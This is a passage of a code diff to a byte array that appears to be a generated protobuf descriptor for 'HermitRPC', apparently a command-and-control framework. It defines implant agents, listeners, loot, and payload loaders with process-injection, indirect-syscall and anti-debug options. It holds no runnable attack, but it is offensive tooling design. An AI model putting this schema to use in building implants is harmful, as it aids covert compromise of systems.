0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, 0x68, 0x12, 0x16, 0x0a, - 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x66, - 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, - 0x6f, 0x6c, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, - 0x63, 0x6f, 0x6c, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x08, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x70, 0x6f, - 0x72, 0x74, 0x18, 0x09, 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x12, - 0x12, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x74, - 0x79, 0x70, 0x65, 0x12, 0x1a, 0x0a, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x18, - 0x0b, 0x20, 
0x01, 0x28, 0x09, 0x52, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x22, - 0xed, 0x02, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, - 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, - 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, - 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, - 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x69, - 0x70, 0x12, 0x0e, 0x0a, 0x02, 0x6f, 0x73, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, - 0x73, 0x12, 0x12, 0x0a, 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x04, 0x61, 0x72, 0x63, 0x68, 0x12, 0x1a, 0x0a, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, - 0x65, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, - 0x65, 0x12, 0x20, 0x0a, 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x55, 0x52, 0x4c, - 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, - 0x55, 0x52, 0x4c, 0x12, 0x20, 0x0a, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x54, 0x79, - 0x70, 0x65, 0x18, 0x09, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, - 0x74, 0x54, 0x79, 0x70, 0x65, 0x12, 0x20, 0x0a, 0x0b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x49, 0x6e, - 0x44, 0x61, 0x74, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x63, 0x68, 0x65, 0x63, - 0x6b, 0x49, 0x6e, 0x44, 0x61, 0x74, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, - 0x18, 0x0b, 0x20, 0x01, 0x28, 0x03, 0x52, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, 0x12, 0x16, 0x0a, - 0x06, 0x6a, 0x69, 0x74, 0x74, 0x65, 0x72, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x6a, - 0x69, 0x74, 0x74, 0x65, 0x72, 0x12, 0x1a, 0x0a, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, - 0x65, 0x18, 0x0d, 0x20, 0x01, 0x28, 0x03, 0x52, 
0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, - 0x65, 0x12, 0x16, 0x0a, 0x06, 0x61, 0x65, 0x73, 0x4b, 0x65, 0x79, 0x18, 0x0e, 0x20, 0x01, 0x28, - 0x09, 0x52, 0x06, 0x61, 0x65, 0x73, 0x4b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x61, 0x65, 0x73, - 0x49, 0x56, 0x18, 0x0f, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x61, 0x65, 0x73, 0x49, 0x56, 0x22, - 0x38, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x18, - 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x12, 0x1c, 0x0a, 0x09, 0x61, - 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, - 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x3c, 0x0a, 0x04, 0x4c, 0x6f, 0x6f, - 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x01, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, - 0x16, 0x0a, 0x06, 0x66, 0x69, 0x6c, 0x74, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x06, 0x66, 0x69, 0x6c, 0x74, 0x65, 0x72, 0x32, 0xd8, 0x0b, 0x0a, 0x09, 0x48, 0x65, 0x72, 0x6d, - 0x69, 0x74, 0x52, 0x50, 0x43, 0x12, 0x30, 0x0a, 0x08, 0x53, 0x61, 0x79, 0x48, 0x65, 0x6c, 0x6c, - 0x6f, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, + 0x61, 0x6c, 0x6c, 0x73, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x6e, 0x74, 0x69, 0x44, 0x65, 0x62, 0x75, + 0x67, 0x18, 0x0f, 0x20, 0x01, 0x28, 0x08, 0x52, 0x09, 0x61, 0x6e, 0x74, 0x69, 0x44, 0x65, 0x62, + 0x75, 0x67, 0x22, 0xf3, 0x02, 0x0a, 0x0d, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, + 0x61, 0x64, 0x65, 0x72, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, + 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 
0x0a, 0x02, + 0x6f, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, 0x04, + 0x61, 0x72, 0x63, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, 0x68, + 0x12, 0x16, 0x0a, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, 0x72, 0x6f, + 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x18, + 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, 0x0a, 0x05, + 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x09, 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, 0x70, 0x6f, + 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x74, 0x65, 0x63, 0x68, 0x6e, 0x69, + 0x71, 0x75, 0x65, 0x18, 0x0b, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x74, 0x65, 0x63, 0x68, 0x6e, + 0x69, 0x71, 0x75, 0x65, 0x12, 0x28, 0x0a, 0x0f, 0x70, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x54, + 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0f, 0x70, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x54, 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, 0x12, 0x2a, + 0x0a, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, + 0x6c, 0x73, 0x18, 0x0d, 0x20, 0x01, 0x28, 0x08, 0x52, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, + 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x6e, + 0x74, 0x69, 0x44, 0x65, 0x62, 0x75, 0x67, 0x18, 0x0e, 0x20, 0x01, 0x28, 0x08, 0x52, 0x09, 0x61, + 0x6e, 0x74, 0x69, 0x44, 0x65, 0x62, 0x75, 0x67, 0x22, 0x80, 0x02, 0x0a, 0x10, 0x50, 0x61, 0x79, + 0x6c, 0x6f, 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x12, 0x0e, 0x0a, + 0x02, 0x69, 0x64, 0x18, 
0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, + 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, + 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x6f, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x05, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, 0x68, 0x12, 0x16, 0x0a, 0x06, 0x66, 0x6f, 0x72, + 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, + 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x18, 0x07, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x12, + 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, + 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x09, + 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x74, + 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, + 0x1a, 0x0a, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x18, 0x0b, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x22, 0xed, 0x02, 0x0a, 0x05, + 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, + 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, + 0x02, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x69, 0x70, 0x12, 0x0e, 0x0a, + 0x02, 0x6f, 0x73, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 
0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, + 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, + 0x68, 0x12, 0x1a, 0x0a, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x07, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x20, 0x0a, + 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x55, 0x52, 0x4c, 0x18, 0x08, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x55, 0x52, 0x4c, 0x12, + 0x20, 0x0a, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x54, 0x79, 0x70, 0x65, 0x18, 0x09, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x54, 0x79, 0x70, + 0x65, 0x12, 0x20, 0x0a, 0x0b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x49, 0x6e, 0x44, 0x61, 0x74, 0x65, + 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x49, 0x6e, 0x44, + 0x61, 0x74, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, 0x18, 0x0b, 0x20, 0x01, + 0x28, 0x03, 0x52, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, 0x12, 0x16, 0x0a, 0x06, 0x6a, 0x69, 0x74, + 0x74, 0x65, 0x72, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x6a, 0x69, 0x74, 0x74, 0x65, + 0x72, 0x12, 0x1a, 0x0a, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, 0x65, 0x18, 0x0d, 0x20, + 0x01, 0x28, 0x03, 0x52, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, 0x65, 0x12, 0x16, 0x0a, + 0x06, 0x61, 0x65, 0x73, 0x4b, 0x65, 0x79, 0x18, 0x0e, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x61, + 0x65, 0x73, 0x4b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x61, 0x65, 0x73, 0x49, 0x56, 0x18, 0x0f, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x61, 0x65, 0x73, 0x49, 0x56, 0x22, 0x38, 0x0a, 0x04, 0x54, + 0x61, 0x73, 0x6b, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, + 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x61, 0x67, 0x65, 0x6e, + 
0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x3c, 0x0a, 0x04, 0x4c, 0x6f, 0x6f, 0x74, 0x12, 0x1c, 0x0a, + 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x16, 0x0a, 0x06, 0x66, + 0x69, 0x6c, 0x74, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x66, 0x69, 0x6c, + 0x74, 0x65, 0x72, 0x32, 0xd8, 0x0b, 0x0a, 0x09, 0x48, 0x65, 0x72, 0x6d, 0x69, 0x74, 0x52, 0x50, + 0x43, 0x12, 0x30, 0x0a, 0x08, 0x53, 0x61, 0x79, 0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x12, 0x0f, 0x2e, + 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, + 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, + 0x65, 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0a, 0x47, 0x65, 0x74, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6f, + 0x6e, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, - 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0a, 0x47, 0x65, 0x74, 0x56, 0x65, - 0x72, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, - 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, - 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x10, 0x4f, - 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x12, + 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x10, 0x4f, 0x70, 0x65, 0x72, 0x61, + 0x74, 0x6f, 0x72, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x12, 0x0f, 0x2e, 0x72, 0x70, + 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x1a, 0x11, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, + 0x00, 0x12, 0x3b, 0x0a, 0x14, 0x4f, 0x70, 
0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x44, 0x65, 0x6c, + 0x65, 0x74, 0x65, 0x42, 0x79, 0x55, 0x75, 0x69, 0x64, 0x12, 0x0e, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, + 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x55, 0x75, 0x69, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, + 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x32, + 0x0a, 0x0f, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x47, 0x65, 0x74, 0x42, 0x79, 0x49, + 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, - 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, - 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x3b, 0x0a, 0x14, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, - 0x72, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, 0x55, 0x75, 0x69, 0x64, 0x12, 0x0e, 0x2e, - 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x55, 0x75, 0x69, 0x64, 0x1a, 0x11, 0x2e, - 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0f, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x47, 0x65, - 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, - 0x2e, 0x49, 0x64, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, - 0x61, 0x74, 0x6f, 0x72, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, - 0x6f, 0x72, 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, - 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, 0x35, - 0x0a, 0x0d, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x61, 0x72, 0x74, 0x12, - 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 
0x65, 0x72, - 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, - 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x11, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, - 0x72, 0x53, 0x74, 0x61, 0x72, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, - 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x35, 0x0a, - 0x10, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x6f, 0x70, 0x42, 0x79, 0x49, + 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x47, 0x65, + 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, + 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, 0x35, 0x0a, 0x0d, 0x4c, 0x69, + 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x61, 0x72, 0x74, 0x12, 0x0f, 0x2e, 0x72, 0x70, + 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x1a, 0x11, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, + 0x00, 0x12, 0x36, 0x0a, 0x11, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x61, + 0x72, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, + 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x35, 0x0a, 0x10, 0x4c, 0x69, 0x73, + 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x6f, 0x70, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, + 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, + 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, + 0x12, 0x37, 0x0a, 0x12, 
